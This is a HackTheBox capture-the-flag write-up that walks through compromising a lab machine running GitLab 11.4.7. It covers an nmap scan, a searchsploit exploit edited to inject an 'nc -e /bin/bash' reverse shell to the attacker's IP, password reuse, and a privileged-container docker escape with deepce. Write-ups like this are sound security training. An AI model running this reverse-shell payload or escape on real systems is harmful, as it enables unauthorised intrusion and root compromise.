![83ba1160aed40b9e82489fb164a0941a.png](5ac295132433425db83e686264c6779a.png)
### Port Scanning and General Enumeration (Nmap)
`nmap -sV -sC -oN nmap/initial -T4 10.10.10.220`
![01766e66f07b0532c6eafa237ac4f942.png](9639a4557dff4f29b40a47a859d98dc6.png)
22 and ..5080?
![24bf77ebc310c17fafc4155a938cb2db.png](47be9c791e674ceba17667fd2b732371.png)
**Gitlab!**
---
### Access (searchsploit, gitlab)
Let's see what version of **Gitlab** we're working with
1. `top right, drop down menu`
2. `help`
![b13dab13c8034866bf0bb34683274d86.png](b33aa49d82b44f4cb87802ba176f4343.png)
Gitlab version **11.4.7**
Checking **searchsploit** for public exploits for **Gitlab 11.4.7**
![f5dffc1577a8836b259fa7323b824e4a.png](12b8d606802146f8a628e183d6ece5fd.png)
I used the first one but it requires a bit of editing. Here's what I added:
```python
open(\\'|""" + f'nc -e /bin/bash YOURIP YOURPORT' + """ \\').read\\"]
```
The original wouldn't work, this one should. (replace *YOURIP* and *YOURPORT* with your listening ip and port, respectively)
Start a listener
`nc -lvnp 4444`
And run the script!
`python3 exploit.py -u YOURUSERNAME -p YOURPASSWORD -g http://10.10.10.220 -l YOURIP -p YOUR PORT`
![4abde2a4dc33c1d5565376d1d8fce23b.png](44f85e16d48b45f788bc17eafee05d22.png)
![a4d0888417d0169ff9a002813cc900cd.png](d8bb5c9fcf4448849a43b63d2a4b8b66.png)
> **Quick tip!**
> > You may want to stabilize your shell at this point. A quick and dirty way to do so is
> > ```
> > python3 -c 'import pty; pty.spawn("/bin/bash")'
> > export TERM=xterm
> >```
---
### Privesc Part 1 (password-reuse, linpeas)
**Linpeas** kicks back a *lot* of juicy informtion, but this box has some curveballs and 90% of it is irrelevant for the completion of this box. This is definitely a case of **K.I.S.S.**
> **K.I.S.S.**
> > *keep it simple stupid*
Main two things we're after here:
![d9ce8df9f740548c9246af17a2c3026d.png](765d36c223a34f75ac273cd8351556ea.png)
![fccc2c3c7c79fc065a7bfa93b8d3aae6.png](505d908d0cc44c7c94b6a3cfeb0eb73d.png)
*keep that in mind for later*
First thing you should *always* do when you find a plaintext password? Use it! Use it everywhere!
Turns out..
![b6c79cbcac5221a07c57150b84d12491.png](2d902d3c6ae9472485fbd7b549cc786f.png)
Let's capture the root fla---
![9426a1f8f5cc67202869a88d2213e5ea.png](954c67f9f8d242788a64f4c7e1c4404e.png)
Well, let's try and escape the docker then!
---
### Privesc Part 2: ESCAPE-trick boogaloo (deepce, docker escape)
First things first when trying to do anything: **Enumeration**. We'll be using **deepce**. It's very similar to **Linpeas**. It's *amazing*.
The interesting finding:
![f8149f7bcc56c9c6039362eef57007d0.png](1987a99903c34ce9bd012e73438d31bc.png)
Running a container as **privileged** gives us the ability to execute commands as root.
The other cool feature of **deepce** is it has an **exploit** mode
`./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce`
*you can read about the available exploits by following the link above in **Reading/Resources***
All that's left to do is **ssh** in as the new root user!
![154c1dc595d2bc4301525500c4c6cbfe.png](cdf082bdb53f4c63b32984dffb5eb685.png)
![9cb7b52fb2f22b63008b10aa39f7584c.png](b1236b1f10654db1b99ae9fb3b92572d.png)
---
Back to [[HackTheBox Index]]
Tags: #htb #hackthebox #gitlab #searchsploit #linpeas #deepce #docker_escape #box_writeups
Related: